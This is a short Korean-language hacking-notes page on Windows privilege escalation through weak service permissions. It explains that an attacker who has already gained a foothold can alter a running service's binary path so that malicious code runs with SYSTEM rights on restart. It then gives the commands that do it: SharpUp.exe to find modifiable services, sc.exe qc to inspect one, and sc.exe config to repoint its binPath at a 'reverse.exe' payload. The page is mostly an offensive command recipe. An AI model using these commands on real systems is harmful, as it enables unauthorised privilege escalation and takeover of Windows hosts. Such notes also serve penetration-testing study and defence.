Weak Service Permissions
침투한 시스템 제어 권한으로 실행 중인 서비스 바이너리 경로를 변조할 수 있다면, 서비스가 재실행 될 때 악성 코드를 실행시켜 시스템 권한을 탈취할 수 있습니다.
Abuse
Last updated
침투한 시스템 제어 권한으로 실행 중인 서비스 바이너리 경로를 변조할 수 있다면, 서비스가 재실행 될 때 악성 코드를 실행시켜 시스템 권한을 탈취할 수 있습니다.
Last updated
# 바이너리 경로 쓰기 권한이 있는 서비스 열거
.\SharpUp.exe audit ModifiableServices
# 변경할 서비스 원본 바이너리 확인
sc.exe qc ExecNotepad
# 바이너리 경로 변경
sc.exe config ExecNotepad binPath="C:\Users\Mick3y\reverse.exe"